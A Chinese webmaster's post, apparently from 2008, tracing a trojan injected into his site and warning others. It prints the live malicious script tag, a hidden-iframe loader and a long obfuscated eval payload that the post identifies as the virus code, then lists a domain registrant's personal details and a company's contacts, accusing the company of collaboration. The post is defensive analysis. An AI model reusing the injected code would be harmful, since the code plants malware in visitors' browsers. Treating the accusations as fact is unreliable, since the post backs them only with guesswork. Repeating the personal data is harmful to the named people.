有一个站被挂马很长时间了，前台页面的马被清掉，但后台的马一直找不到，实在不舒服，准备将这个站自杀掉，但又不甘心，决定再找一次。

花了四个多小时，终于找到了，现贴出来提醒大家注意，大家一定不要点马所在的网址，除非你安装了杀毒软件，光一个360是不行的。

先看这一段代码：

<html xmlns="http://www.w3.org/1999/xhtml">

<script language='JavaScript' type='text/JavaScript' src='http://www.w3og.cn/org'></script>

<head>

注意其中的'http://www.w3og.cn/org',这是木马网页地址。很有欺骗性，我找过很多次都没注意到。服务器好象是四川乐山电信的，我几乎要拿我自己的服务器与之同归于尽。

再强调一下，贴出来不是要害你啊，不要乱点。

Domain Name: w3og.cn

ROID: 20080213s10001s70391079-cn

Domain Status: ok

Registrant Organization: 陈强

Registrant Name: 陈强

Administrative Email: zhuya22@126.com

Sponsoring Registrar: 北京新网数码信息技术有限公司

Name Server:ns2.xinnet.cn

Name Server:ns2.xinnetdns.com

Registration Date: 2008-02-13 17:16

Expiration Date: 2011-02-13 17:16

http://www.zjedu.gov.cn/TzemailA ... 277010f71e2c65c0027

电子邮件： zhuya22@126.com

联系电话： 0577658796549

联系地址： 电风扇士大夫

提交时间： 2006-12-11

主题： 这样的设施也能办大学？？？

建议内容： 温职院INTERNET网硬件设施太差 每栋宿舍楼网速一直以来比拨号

上网还慢 ，根本不能满足大学生对TNTER网的需求

交了30元/月的网费却只能上垃圾网络，收了我们的血汗钱却不干人事，气人兮

气人，

学校机房既小又差，还1。5元/小时，我靠 这也叫大学吗？？我们学剩

上网只能跑正上的网吧，远又网费又贵，很多同学为了省钱只能玩通宵

温职院的网络设施根本不行，不知道评估团怎么办事的

可笑的是学校还想评全国十大优秀高职 丢死人了

请注意这个公司长沙智之星软件有限公司www.zzstar.cn,这个木马一直为这个站带流量，如果是被陷害的，那还情有可原。如果是同挂马者合作的话，严重鄙视。总经理：廖某某（不贴名字了）

公 司 地 址： 长沙市麓山南路343号(矿山研究院内)902室

联 系 电 话： 0731-2173510 (0)13787116266

邮 政 编 码： 410012

电 子 邮 箱： zzstar888@126.com zzstar168@163.com

公 司 网 址：www.zzstar.cn www.macrorise.com

业务联系QQ：7428377 165635301

另一个受害者的文章:今天学生处的人说他们网页打开就提示有病毒。上去看了一下，果然，打开之后ie有打开其他网页的动作，浏览器很卡，然后跳出一个RealPlayer的窗口，Nod32提示

2008-4-18 16:21:09 HTTP 过滤器 文件 http://user1.33216.net/bak.css Win32/TrojanDownloader.Small.OBJ 特洛伊木马 连接中断 - 已隔离 NICAdministrator 通过应用程序访问 web 时检测到威胁: C:Program FilesMaxthon2Maxthon.exe.

于是开始检查。

费了一番功夫，就不多说了，直接进入主题。

打开Ethereal，对tcp 80端口进行监测，打开Firefox，并清除缓存（如果不清除可能造成不能完全打开）。

完全打开页面后，关闭监测。进行查看。

按照理论来说，应该只有本机与服务器之间的通信，哪么其他IP地址的通信就很可以了。

果然，看到了61.174.63.178这个IP(www.w3og.cn/org)，使用Ethereal可以看到具体的URL。

使用FF打开这个网页。

页面是空白的，查看源代码内容如下：

www.w3og.cn/org/

document.write("<div style='display:none'>")

document.write("<iframe src=http://abc1.315666.net/s22.html></iframe>")

document.write("<iframe src=http://www.zzstar.cn/reg/w3o.htm></iframe>")

document.write("</div>")

顺藤摸瓜：

其中

www.zzstar.cb/reg/w30.htm

<script language="javascript" src="http://count48.51yes.com/click.aspx?id=485576456&logo=1"></script>

是51yes的一个统计。

http://abc1.315666.net/s22.html

<iframe src="news.html" width=100 height=0></iframe>

<script language="javascript" type="text/javascript" src="http://js.users.51.la/1793783.js"></script>

第二个页面也是统计，第一个页面就是病毒了。

再次使用FF打开，查看源代码：

<script>window.onerror=function(){return true;}</script>

<script>

window.defaultStatus="完成";

eval("1641621711731661411624014573151216614116240141144157755014415714316515514515616456143162145141164145105154145155145156164504215714215214514316442515173151216614116240153141166754213417064142134170667113417066145134170666713417067631341706614613417066661341706764427315121411441575616314516410116416416215114216516414550421431541411631631511444254421431541631511447210210471661036565665566651016355616110460557170631015560601036064106103627110563664251731512166141162401531411667542134170641421341706671134170661451341706667134170676313417066146134170666613417067644273151216614116240141163751411441575614316214514116414515714215214514316450421011441571441425612316416214514115542544242511751512143141164143150501455117317573151214615115614115415417117315121511465014541754213315714215214514316440105162162157162135425117315121441571431651551451561645616716215116414550427416314316215116016440163162143751501641641607213457134571651631451626156636362616656156145164134571551636066606164561521637674134571631431621511601647642511751512145154163145173151216416217117340166141162401467315121661411624016415016515614414516275156145167401011431641511661451301171421521451431645042104120103154151145156164561261571444251731751512143141164143150501465117317573151214615115614115415417117340151146501464175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016715114416415075616060401501451511471501647560401631621437515016416416072575716516314516261566363626166561561451645712415016515614414516256150164155154767457151146162141155145764751175175151216416217117316614116240147731512166141162401471541671571621541447515614516740101143164151166145130117142152145143164504210711410311010112456107114103150141164103164162154566142517317515121431411641431505014751173175731512146151156141154154171173151146501474175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016316417115414575144151163160154141171721561571561454016316214375421501641641607257571651631451626156636362616656156145164571071141271171221141045615016415515442767457151146162141155145764751175175151216416217117316614116240150731512166141162401631641571621557515614516740101143164151166145130117142152145143164504211512012356123164157162155120154141171145162566142517317515121431411641431505015051173175731512146151156141154154171173151146501504175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016316417115414575144151163160154141171721561571561454016316214375421501641641607257571651631451626156636362616656156145164571231641571621551111115615016415515442767457151146162141155145764751175175151216416217117316614116240151731512166141162401621451411547515614516740101143164151166145130117142152145143164504211110512212010316415456111105122120103164154566142517317515121431411641431505015151173175731512146151156141154154171173151146501514175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016316417115414575144151163160154141171721561571561454016316214375421501641641607257571651631451626156636362616656156145164571221451411545615016415515442767457151146162141155145764751151214415714316515514515616456167162151164145504774163103162111160124401141011561071651011471057542152101166101163103162111160124424016316214375150164164160721345713457165163145162615663636261665615614516413457162145141154561521637674134571631431621511601647647511751751512164162171173166141162401527315121661411624010214115114416575156145167401011431641511661451301171421521451431645042102141151144165102141162561241571571544251731751512143141164143150501525117317573151214615115614115415417117315114650152417542133157142152145143164401051621621571621354251173151210214115114416513342134170646413417066143134170661461341706661134170666413417064641341706563421355042150164164160725757165163145162615663636261665615614516457102141151144165561431411424254404213417064621341706661134170667113417066641341706765134170621451341706665134170677013417066654254406051175175151215114650146757542133157142152145143164401051621621571621354240464640147757542133157142152145143164401051621621571621354240464640150757542133157142152145143164401051621621571621354240464640151757542133157142152145143164401051621621571621354240464640152757542133157142152145143164401051621621571621354251151217315415714314116415115715656162145160154141143145504214114215716516472142154141156153425173175175175")

/*Extreme*/

</script>

很显然，这个就是病毒源代码了。加密了而且，不管他了。

另外注意到，

http://www.51.la/report/0_help.asp?id=1793783&err=4&help=2

可以看到统计名称。不就是为了一点流量，做这些犯罪的事情，何必呢？

1、使用FF Ethereal。FF不会被这些漏洞利用，而IE基本是一打开就死了。

2、上传的漏洞位于xgcAD2008041.js，应该是用的动易的漏洞上传的。

3、搜索w3og.cn，基本搜索到的网页，google都会提示是恶意网站...

拥有这个W3og.cn的人的注册信息：

Domain Name: w3og.cn ROID: 20080213s10001s70391079-cn Domain Status: ok Registrant Organization: 陈强 Registrant Name: 陈强 Administrative Email: zhuya22@126.com Sponsoring Registrar: 北京新网数码信息技术有限公司 Name Server:ns2.xinnet.cn Name Server:ns2.xinnetdns.com Registration Date: 2008-02-13 17:16 Expiration Date: 2011-02-13 17:16

这个w3og.cn和zzstar(一家建站公司)显然是有关系的，要不然也不会再木马里面挂上zzstar的流量统计...